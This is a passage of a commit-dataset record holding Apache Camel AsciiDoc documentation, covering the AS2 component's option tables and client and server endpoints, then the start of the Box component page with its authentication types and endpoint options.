Description | Default | Type\n| *camel.component.as2.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.as2.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.as2.configuration.api-name* | What kind of operation to perform | | AS2ApiName\n| *camel.component.as2.configuration.as2-from* | The value of the AS2From header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-message-structure* | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *camel.component.as2.configuration.as2-to* | The value of the AS2To header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-version* | The version of the AS2 protocol. | 1.1 | String\n| *camel.component.as2.configuration.client-fqdn* | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.compression-algorithm* | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *camel.component.as2.configuration.decrypting-private-key* | The key used to encrypt the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.disposition-notification-to* | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *camel.component.as2.configuration.edi-message-transfer-encoding* | The transfer encoding of EDI message. | | String\n| *camel.component.as2.configuration.edi-message-type* | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *camel.component.as2.configuration.encrypting-algorithm* | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *camel.component.as2.configuration.encrypting-certificate-chain* | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *camel.component.as2.configuration.from* | The value of the From header of AS2 message. | | String\n| *camel.component.as2.configuration.mdn-message-template* | The template used to format MDN message | | String\n| *camel.component.as2.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.as2.configuration.request-uri* | The request URI of EDI message. | \/ | String\n| *camel.component.as2.configuration.server* | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *camel.component.as2.configuration.server-fqdn* | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.server-port-number* | The port number of server. | | Integer\n| *camel.component.as2.configuration.signed-receipt-mic-algorithms* | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *camel.component.as2.configuration.signing-algorithm* | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *camel.component.as2.configuration.signing-certificate-chain* | The chain of certificates used to sign EDI message. | | Certificate[]\n| *camel.component.as2.configuration.signing-private-key* | The key used to sign the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.subject* | The value of Subject header of AS2 message. | | String\n| *camel.component.as2.configuration.target-hostname* | The host name (IP or DNS name) of target host. | | String\n| *camel.component.as2.configuration.target-port-number* | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *camel.component.as2.configuration.user-agent* | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *camel.component.as2.enabled* | Whether to enable auto configuration of the as2 component. This is enabled by default. | | Boolean\n| *camel.component.as2.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n== Client Endpoints:\n\nClient endpoints use the endpoint prefix *`client`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`client`*.\n\n[source]\n----\nas2:\/\/client\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|send |ediMessage, requestUri, subject, from, as2From, as2To, as2MessageStructure, ediMessageContentType, ediMessageTransferEncoding, dispositionNotificationTo, signedReceiptMicAlgorithms |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _client_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|ediMessage |String\n\n|requestUri |String\n\n|subject |String\n\n|from |String\n\n|as2From |String\n\n|as2To |String\n\n|as2MessageStructure |org.apache.camel.component.as2.api.AS2MessageStructure\n\n|ediMessageContentType |String\n\n|ediMessageTransferEncoding |String\n\n|dispositionNotificationTo |String\n\n|signedReceiptMicAlgorithms |String[]\n|===\n\n\n== Server Endpoints:\n\nServer endpoints use the endpoint prefix *`server`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`server`*.\n\n[source]\n----\nas2:\/\/server\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|listen |requestUriPattern |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _server_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|requestUriPattern |String\n|===\n\n","old_contents":"[[as2-component]]\n= AS2 Component\n\n*Since Camel 2.22*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe AS2 component provides transport of EDI messages using the HTTP transfer protocol\nas specified in https:\/\/tools.ietf.org\/html\/rfc4130[RFC4130]. \n\nNOTE: This component is currently a work in progress. Expect URI options and path and query parameters to change in future versions of this component.\n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-as2<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source]\n----\nas2:\/\/apiName\/methodName\n----\n\napiName can be one of:\n\n* client\n* server\n\n\n== AS2 Options\n\n\n\/\/ component options: START\nThe AS2 component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | AS2Configuration\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\/\/ endpoint options: START\nThe AS2 endpoint is configured using URI syntax:\n\n----\nas2:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | AS2ApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n=== Query Parameters (49 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *as2From* (common) | The value of the AS2From header of AS2 message. | | String\n| *as2MessageStructure* (common) | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *as2To* (common) | The value of the AS2To header of AS2 message. | | String\n| *as2Version* (common) | The version of the AS2 protocol. | 1.1 | String\n| *clientFqdn* (common) | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *compressionAlgorithm* (common) | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *decryptingPrivateKey* (common) | The key used to encrypt the EDI message. | | PrivateKey\n| *dispositionNotificationTo* (common) | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *ediMessageTransferEncoding* (common) | The transfer encoding of EDI message. | | String\n| *ediMessageType* (common) | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *encryptingAlgorithm* (common) | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *encryptingCertificateChain* (common) | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *from* (common) | The value of the From header of AS2 message. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *mdnMessageTemplate* (common) | The template used to format MDN message | | String\n| *requestUri* (common) | The request URI of EDI message. | \/ | String\n| *server* (common) | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *serverFqdn* (common) | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *serverPortNumber* (common) | The port number of server. | | Integer\n| *signedReceiptMicAlgorithms* (common) | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *signingAlgorithm* (common) | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *signingCertificateChain* (common) | The chain of certificates used to sign EDI message. | | Certificate[]\n| *signingPrivateKey* (common) | The key used to sign the EDI message. | | PrivateKey\n| *subject* (common) | The value of Subject header of AS2 message. | | String\n| *targetHostname* (common) | The host name (IP or DNS name) of target host. | | String\n| *targetPortNumber* (common) | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *userAgent* (common) | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-as2-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.as2.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.as2.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.as2.configuration.api-name* | What kind of operation to perform | | AS2ApiName\n| *camel.component.as2.configuration.as2-from* | The value of the AS2From header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-message-structure* | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *camel.component.as2.configuration.as2-to* | The value of the AS2To header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-version* | The version of the AS2 protocol. | 1.1 | String\n| *camel.component.as2.configuration.client-fqdn* | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.compression-algorithm* | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *camel.component.as2.configuration.decrypting-private-key* | The key used to encrypt the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.disposition-notification-to* | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *camel.component.as2.configuration.edi-message-transfer-encoding* | The transfer encoding of EDI message. | | String\n| *camel.component.as2.configuration.edi-message-type* | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *camel.component.as2.configuration.encrypting-algorithm* | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *camel.component.as2.configuration.encrypting-certificate-chain* | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *camel.component.as2.configuration.from* | The value of the From header of AS2 message. | | String\n| *camel.component.as2.configuration.mdn-message-template* | The template used to format MDN message | | String\n| *camel.component.as2.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.as2.configuration.request-uri* | The request URI of EDI message. | \/ | String\n| *camel.component.as2.configuration.server* | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *camel.component.as2.configuration.server-fqdn* | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.server-port-number* | The port number of server. | | Integer\n| *camel.component.as2.configuration.signed-receipt-mic-algorithms* | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *camel.component.as2.configuration.signing-algorithm* | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *camel.component.as2.configuration.signing-certificate-chain* | The chain of certificates used to sign EDI message. | | Certificate[]\n| *camel.component.as2.configuration.signing-private-key* | The key used to sign the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.subject* | The value of Subject header of AS2 message. | | String\n| *camel.component.as2.configuration.target-hostname* | The host name (IP or DNS name) of target host. | | String\n| *camel.component.as2.configuration.target-port-number* | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *camel.component.as2.configuration.user-agent* | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *camel.component.as2.enabled* | Whether to enable auto configuration of the as2 component. This is enabled by default. | | Boolean\n| *camel.component.as2.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n== Client Endpoints:\n\nClient endpoints use the endpoint prefix *`client`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`client`*.\n\n[source]\n----\nas2:\/\/client\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|send |ediMessage, requestUri, subject, from, as2From, as2To, as2MessageStructure, ediMessageContentType, ediMessageTransferEncoding, dispositionNotificationTo, signedReceiptMicAlgorithms |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _client_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|ediMessage |String\n\n|requestUri |String\n\n|subject |String\n\n|from |String\n\n|as2From |String\n\n|as2To |String\n\n|as2MessageStructure |org.apache.camel.component.as2.api.AS2MessageStructure\n\n|ediMessageContentType |String\n\n|ediMessageTransferEncoding |String\n\n|dispositionNotificationTo |String\n\n|signedReceiptMicAlgorithms |String[]\n|===\n\n\n== Server Endpoints:\n\nServer endpoints use the endpoint prefix *`server`* followed by the name of a method\nand associated options described next. The endpoint URI MUST contain the prefix *`server`*.\n\n[source]\n----\nas2:\/\/server\/method?[options]\n----\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption *`inBody`* that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format *`CamelAS2.<option>`*. Note that the *`inBody`* option\noverrides message header, i.e. the endpoint\noption *`inBody=option`* would override a *`CamelAS2.option`* header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be `null`.\nNote that the `null` value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of AS2 API errors the endpoint will throw a\nRuntimeCamelException with a\n*org.apache.http.HttpException* derived exception\ncause.\n\n[width=\"100%\",cols=\"10%,10%,70%\",options=\"header\"]\n|===\n|Method |Options |Result Body Type\n\n|listen |requestUriPattern |org.apache.http.protocol.HttpCoreContext\n|===\n\nURI Options for _server_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|requestUriPattern |String\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7249c5fcc5fcd05b6ab6018142d3a052dca1294","subject":"Change download previous file version endpoint (#2642)","message":"Change download previous file version endpoint (#2642)\n\nShorthand Alias will remain nonfunctional until changes are made on backend mapping.\n\nThe real working endpoint is downloadPreviousFileVersion (singular form), on backend downloadVersion is mapped with downloadPreviousFileVersions (plural form) which not exists.\n","repos":"gnodet\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,cunningt\/camel,objectiser\/camel,CodeSmell\/camel,tadayosi\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,mcollovati\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,adessaigne\/camel,apache\/camel,alvinkwekel\/camel,Fabryprog\/camel,pax95\/camel,christophd\/camel,zregvart\/camel,kevinearls\/camel,tdiesler\/camel,CodeSmell\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,ullgren\/camel,Fabryprog\/camel,pmoerenhout\/camel,davidkarlsen\/camel,pax95\/camel,gnodet\/camel,mcollovati\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,objectiser\/camel,christophd\/camel,Fabryprog\/camel,CodeSmell\/camel,apache\/camel,kevinearls\/camel,pax95\/camel,pax95\/camel,tadayosi\/camel,nicolaferraro\/camel,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,kevinearls\/camel,apache\/camel,tdiesler\/camel,punkhorn\/camel-upstream,zregvart\/camel,kevinearls\/camel,tdiesler\/camel,alvinkwekel\/camel,pmoerenhout\/camel,ullgren\/camel,mcollovati\/camel,christophd\/camel,Fabryprog\/camel,adessaigne\/camel,objectiser\/camel,mcollovati\/camel,pax95\/camel,pmoerenhout\/camel,zregvart\/camel,gnodet\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,tdiesler\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,davidkarlsen\/camel,DariusX\/camel,tadayosi\/camel,pmoerenhout\/camel,objectiser\/camel,nikhilvibhav\/camel,gnodet\/camel,tdiesler\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel","old_file":"components\/camel-box\/camel-box-component\/src\/main\/docs\/box-component.adoc","new_file":"components\/camel-box\/camel-box-component\/src\/main\/docs\/box-component.adoc","new_contents":"[[box-component]]\n== Box Component\n\n*Available as of Camel version 2.14*\n\nThe Box component provides access to all of the Box.com APIs accessible\nusing https:\/\/github.com\/box\/box-java-sdk\/[https:\/\/github.com\/box\/box-java-sdk]. It\nallows producing messages to upload and download files, create, edit,\nand manage folders, etc. It also supports APIs that allow polling for\nupdates to user accounts and even changes to enterprise accounts, etc.\n\nBox.com requires the use of OAuth2.0 for all client application\nauthentication. In order to use camel-box with your account, you'll need\nto create a new application within Box.com at\nhttps:\/\/developer.box.com\/[https:\/\/developer.box.com].\nThe Box application's client id and secret will allow access to Box APIs\nwhich require a current user. A user access token is generated and\nmanaged by the API for an end user. \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-box<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n----\n\n=== Connection Authentication Types\n\nThe Box component supports three different types of authenticated connections.\n\n==== Standard Authentication\n\n*Standard Authentication* uses the *OAuth 2.0 three-legged authentication process* to authenticate its connections with Box.com. This type of authentication enables Box *managed users* and *external users* to access, edit, and save their Box content through the Box component.\n\n==== App Enterprise Authentication\n\n*App Enterprise Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as a *Service Account* for a *Box Application*. This type of authentication enables a service account to access, edit, and save the Box content of its *Box Application* through the Box component.\n\n==== App User Authentication\n\n*App User Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as an *App User* for a *Box Application*. This type of authentication enables app users to access, edit, and save their Box content in its *Box Application* through the Box component.\n\n=== Box Options\n\n\/\/ component options: START\nThe Box component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | BoxConfiguration\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Box endpoint is configured using URI syntax:\n\n----\nbox:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | BoxApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n==== Query Parameters (20 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Box application client ID | | String\n| *enterpriseId* (common) | The enterprise ID to use for an App Enterprise. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *userId* (common) | The user ID to use for an App User. | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *httpParams* (advanced) | Custom HTTP params for settings like proxy host | | Map\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessTokenCache* (security) | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *clientSecret* (security) | Box application client secret | | String\n| *encryptionAlgorithm* (security) | The type of encryption algorithm for JWT. Supported Algorithms: RSA_SHA_256 RSA_SHA_384 RSA_SHA_512 | RSA_SHA_256 | EncryptionAlgorithm\n| *maxCacheEntries* (security) | The 